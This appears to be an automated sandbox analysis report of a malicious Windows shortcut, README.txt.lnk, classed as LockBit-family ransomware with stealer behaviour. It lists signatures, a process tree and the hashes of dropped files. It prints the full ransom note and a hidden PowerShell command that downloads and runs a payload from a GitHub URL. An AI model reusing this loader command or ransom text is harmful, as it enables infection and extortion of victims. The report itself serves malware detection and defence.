Overview

overview

10

Static

static

1

README.txt.lnk

windows7-x64

3

README.txt.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-01-2025 14:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    README.txt.lnk

  • Size

    1KB

  • MD5

    e1cff745a65a199bdf9dfebe3f69e3f7

  • SHA1

    8c77e01ceb0ff774a66afa5b7a32b0735e422e9e

  • SHA256

    3b497ec4d80770a5172a72f871528397fde8ea5969aa2c3cde98edb0a6946355

  • SHA512

    7e9204f24290dfdff14200945a31b7d3421122f3fb526845a8250e4325751af5fac226057becf1d0d381f021cca6aae7f6fe0b2d2b517c3441006423de03496c

Score
10/10
lockbitdefense_evasiondiscoveryransomwarespywarestealer

Malware Config

Extracted

Path

C:\RlWCfyLxZ.README.txt

Ransom Note
======================================== !!! ATTENTION !!! Your Files Have Been Encrypted by ManiaCrypt ======================================== What Happened? -------------- All of your important files, documents, photos, and databases have been encrypted using RSA. Without our decryption program, your files cannot be restored. Why Trust Us: -------------------- If we dont give you the decryption program after payment, nobody will trust us. What You Need to Do: -------------------- To get the decryption program, you must contact us. Steps to Restore Your Files: ---------------------------- 1. Open Discord and add the username ballets4. 2. Send us a message and mention your situation. 3. We will provide further instructions for obtaining the decryption program. Important Information: ----------------------- - DO NOT attempt to recover your files using third-party tools. They may damage your data and make recovery impossible. - DO NOT rename, move, or modify the encrypted files. This will also make decryption impossible. - Only we have the tools required to decrypt your files safely and effectively. We are waiting for your message. Time is critical. ======================================== Your Files. Your Responsibility. ========================================

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

    ransomwarelockbit
  • Lockbit family
    lockbit
  • Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
  • Renames multiple (622) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops desktop.ini file(s) 2 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Control Panel 2 IoCs
    defense_evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\README.txt.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start notepad.exe & powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3404
      • C:\Windows\system32\notepad.exe
        notepad.exe
        3⤵
          PID:4848
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4180
          • C:\Users\Admin\91qsdf.exe
            "C:\Users\Admin\91qsdf.exe"
            4⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • System Location Discovery: System Language Discovery
            • Modifies Control Panel
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4216
            • C:\Windows\splwow64.exe
              C:\Windows\splwow64.exe 12288
              5⤵
              • Drops file in System32 directory
              PID:2968
            • C:\ProgramData\1C7D.tmp
              "C:\ProgramData\1C7D.tmp"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4776
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\1C7D.tmp >> NUL
                6⤵
                • System Location Discovery: System Language Discovery
                PID:5328
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:1052
      • C:\Windows\system32\printfilterpipelinesvc.exe
        C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
        1⤵
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
          /insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{B15A1A52-B363-41E5-A429-9F2CA36B325E}.xps" 133823766926380000
          2⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of SetWindowsHookEx
          PID:4772

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\$Recycle.Bin\S-1-5-21-3442511616-637977696-3186306149-1000\BBBBBBBBBBB
        Filesize

        129B

        MD5

        d6854f9029fe1b67033d5b3a54233b9c

        SHA1

        91a36a05a2c7d84e8579227f415d6a153ee6c0dc

        SHA256

        778875b8b8305b0de0eaee60d2c7809204409b059a67ab137f40ca5a43a56219

        SHA512

        98bb0130367b9e29655958d9fe05d36cb957378943e80a50cd1fae6aa42653d5a528134f56326dadb45c08f9ebd25f5497fc5c6893a84c8ab5cac463f6eb7b96

        Download Submit

      • C:\ProgramData\1C7D.tmp
        Filesize

        14KB

        MD5

        294e9f64cb1642dd89229fff0592856b

        SHA1

        97b148c27f3da29ba7b18d6aee8a0db9102f47c9

        SHA256

        917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2

        SHA512

        b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf

        Download Submit

      • C:\RlWCfyLxZ.README.txt
        Filesize

        1KB

        MD5

        c283c63ae856a725b5e4f127156e4cf6

        SHA1

        d8d9b6f436f2495f52eb248f05998835fc71738d

        SHA256

        9bcbb2fc5d4124bce953bda76499c9a1ddf81a7befb06dd1c0294bedd3c9ba4b

        SHA512

        3a07269c7de4a3ce862aa8f15014bab2f39497c1be0359fd34b2ecb4f417dd9cdcb43c249d7f80563d2facedaece9741310f5e8cd452e15c508e02098be9d0e2

        Download Submit

      • C:\Users\Admin\91qsdf.exe
        Filesize

        147KB

        MD5

        5e0b0af4c133567f05fe4efd9b6936e5

        SHA1

        5469f3b48217924741c024cd2f8fb8f808502654

        SHA256

        bd66fb04d8359196cb918f81f48a662830928dfd3218dfe0cc2418e21615f5a5

        SHA512

        9ccb59ee9688deef4fef9d329337299e126f40cc904acdea288e7b96d72a9c9546b8da2a175aeeefe7547e6167898de5df97f8a123b9189da94d86e4ffb421fa

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eisjz4u2.q4t.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\{D9C9254A-B37C-4C79-8CEC-0421E03C60B8}
        Filesize

        4KB

        MD5

        2c32a0bdb0c9912003da683302755c49

        SHA1

        2b660019bae13f6cf56e56c1f44200ed1d8ff46f

        SHA256

        af6d9975e1444622451cb8a6aefd97569fd8614357496e5a92c6dc30714c282f

        SHA512

        7400756d5e4366e42a2b1b27d03215386933cea28ed809525bd2a360265255830534e97edd1732f9fdae37726127366a46dbd2af50cf8fca2db03b5d77d65445

        Download Submit

      • C:\Users\Admin\DDDDDDDDDD
        Filesize

        147KB

        MD5

        8fcacfe98be79907b9dc770eda96d3b4

        SHA1

        7e6a7430479d95a7afc5d417b170fb277b5e321e

        SHA256

        d476dacfa4d784f5cdd02819cdd264c714a6d00aa19a9ea54424c42fbd499a00

        SHA512

        78b165385367c395ca8970dba234188ca06ab7bd43ae406b6399ea6a501da3226aa18b4b27579ab5f3721de86254a39804bc2b14e3d94e299353849176b84432

        Download Submit

      • C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2
        Filesize

        4KB

        MD5

        b1d876707020cc449327f8160b75293c

        SHA1

        9f8a00f5fa1d829ee46526732102a9d03855d9eb

        SHA256

        88a382d7cfefd7e1dd83b62240269da62be9c52b92e2c4f0746bb26a0baeb6b2

        SHA512

        931cdd0f21408da51e4508e49668a23f1a83bff1ba8609c66f98926a2e405b91230d2b336b42868b152cfdc71dc184de16fa9578b71c451f13b72da611798886

        Download Submit

      • F:\$RECYCLE.BIN\S-1-5-21-3442511616-637977696-3186306149-1000\DDDDDDDDDDD
        Filesize

        129B

        MD5

        ec686952cd0aa5dbb6e1abb19a20ff3f

        SHA1

        139507d38142ec3720f5efd1b268802ac1161d45

        SHA256

        3296fb96faae79866ba4a4f6fde278ce19d54d38ec81e90e0a5107822fafc1bd

        SHA512

        90cc4df3e189ea8f2251cbc2ff18251103ea64f369da7acddd5fffa14bc85bed105e4954efff6d3a7aa3c4bec7883d57b08f18940cea24539fe6223c277f001b

        Download Submit

      • memory/4180-13-0x000002A67C950000-0x000002A67CB12000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/4180-0-0x00007FFA5E943000-0x00007FFA5E945000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4180-1-0x000002A663820000-0x000002A663842000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4180-22-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4180-11-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4180-12-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4772-3043-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4772-3044-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4772-3048-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4772-3078-0x00007FFA3A950000-0x00007FFA3A960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4772-3079-0x00007FFA3A950000-0x00007FFA3A960000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4772-3047-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4772-3042-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

        Filesize

        64KB

        Download